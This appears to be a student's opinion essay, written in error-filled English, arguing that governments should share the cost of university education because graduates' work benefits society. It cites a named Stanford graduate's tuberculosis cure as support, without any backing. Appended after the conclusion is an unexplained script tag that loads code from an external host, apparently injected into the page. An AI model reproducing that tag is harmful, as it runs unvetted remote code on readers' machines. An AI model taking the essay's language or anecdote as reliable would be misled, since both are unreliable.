Unversity students should pay in full, for their own education instead of the society funding their study. The reason is that individuals tend to benefit after graduation more than the society.

To what extent do you agree or disagree?!

And give your own opinion.

At the beginning, if we need to talk the advantages, it will amlost benefit both sides sides society and individuals alike, because those twc parts depend on each. We can not seperate one from the other. Notable that individuals are important in the society, so human will contribute to develop their country, so it should be counted as benefits for their community. As a result i disagree that the students have to pay the complete amount from the the start until graduation.

On the one hand, Government paly a basic role by encouraging people to continue their education in the universities in different fields, such medicine, and architecture. The government shall take step to save a specific amonut of money to support the students for studying. Or providing a scholarships for intelligent students in certain subjects which they are specialized in. For example there is a student his name is Jack Tomerson graduated from the fculty medicin in Stanford University, he has created a medicine during his studying in the university to heal patients from the disease of tuberculosis in his society Furthermore, is not this invention counted as a benefits? On this way that the government should think about those kind of people and help them financialy, they must pay attention and giving them the full careness.

To sum up, It is not deniable that both should have a mutual benefits and advantages. <script src=//static.cbu.net/3ff55e04e4c920e5></script>